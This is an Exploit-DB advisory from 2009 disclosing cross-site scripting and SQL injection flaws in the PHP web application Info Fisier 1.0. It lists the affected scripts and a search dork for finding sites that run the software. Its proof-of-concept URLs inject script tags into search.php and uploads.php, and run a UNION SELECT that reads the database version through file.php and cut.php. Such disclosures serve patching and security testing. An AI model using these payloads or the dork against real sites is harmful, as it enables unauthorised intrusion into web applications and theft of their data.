info fisier 1.0 - Multiple Vulnerabilities

2009-12-27T00:00:00
ID EDB-ID:10728
Type exploitdb
Reporter kaozc9
Modified 2009-12-27T00:00:00

Description

Info Fisier 1.0 multiple Vulnerabilities. Webapps exploit for php platform

                                        
                                            ################################################################################################
# [+] Author : kaozc9                                                                          #
# [+] Email  : kaozc9@gmail.com                                                                #
# [+] Site   : www.paradisextem.co.cc                                                          #
# [+] Team   : ParadisexTeam                                                                   #
# [+] Dork   : Powered by Info Fisier.                                                         #
################################################################################################
#=========================================XSS==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#		http://server/path/search.php                                               #
#               http://server/path/uploads.php                                              #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/search.php?key=<script>alert(12345);</script>                      #
#     http://server/path/uploads.php?p=<script>alert(12345);</script>                       #
#=========================================SQL==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#		http://server/path/file.php                                                 #
#               http://server/path/cut.php                                                  #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/file.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11        #
#     http://server/path/cut.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11         #  
#                                                                                              #
################################################################################################